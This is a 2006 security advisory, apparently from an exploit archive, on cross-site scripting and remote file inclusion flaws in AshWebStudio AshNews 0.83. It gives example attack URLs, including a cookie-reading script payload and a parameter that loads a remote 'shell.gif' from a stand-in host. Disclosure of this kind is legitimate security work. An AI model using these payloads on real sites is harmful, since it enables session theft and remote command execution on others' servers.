ashnews083.txt

ashnews083.txt: Posted Feb 2, 2006; Authored by zeus | Site Security-mx.org; AshWebStudio in Ashnews version 0.83 is susceptible to cross site scripting attacks and remote file inclusion flaws.; tags | exploit, remote, xss, file inclusion; SHA-256 | bf428ab66387cf06fcad67bfd98f8b7acb42600c71eb16c9353a18196875d622; Download | Favorite | View

ashnews083.txt

###########################################################################
# Advisory #7 Title: AshWebStudio AshNews Multiple Vulnerabilities
#
#
# Author: 0o_zeus_o0
# Contact: zeus@diosdelared.com
# Website: Security-mx.org
# Date: 01/02/2006
# Risk: High
# Vendor Url: http://dev.ashwebstudio.com/?section=ashnews
# Affected Software: AshWebStudio AshNews
# Non Affected:
#
# We Are: olimpus klan team
#
#Info:
#================================================================
#the vulneravilidad of cross site scripting allows to a kidnapping of
#identity by means of the robbery of the cookie,
#this bug is in file ashnews.php.
#now also are two bugs of high gravity which allow remote
#cases out inclusion and the execution of commands
#commands in the servant,
#it is considered burdens so that deformation of the site or robbery
#of confidential information can cause these errors
#they are in the archives,
#ashnews.php and ashheadlines.php
#
#Example cross site scripting:
#================================================================
#
#http://example.com/[ashdirpath]/ashnews.php?page=showcomments&id=<script>alert(
document.cookie);</script>
#
#Example Remote File Inclusion:
#================================================================

#http://example.com/[ashdirpath]/ashheadlines.php?pathtoashnews=
http://www.example.com/shell.gif?
#
#http://www.example.com/[ashdirpath]/ashnews.php?pathtoashnews=
http://www.example.com/shell.gif?
#
#Solution:
#================================================================
#
#reported the vendor or in security-mx.org
#
#
#VULNERABLE VERSIONS
#================================================================
#ashnews v0.83 Other versions may also be affected.
#
#
#================================================================
#Contact information
#0o_zeus_o0
#zeus@diosdelared.com
#www.Security-mx.org
#================================================================
#greetz: lady fire,Mi beba, olimpus klan team and all security-mx
##############################################################################

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

ashnews083.txt

ashnews083.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ashnews083.txt

Share This

ashnews083.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems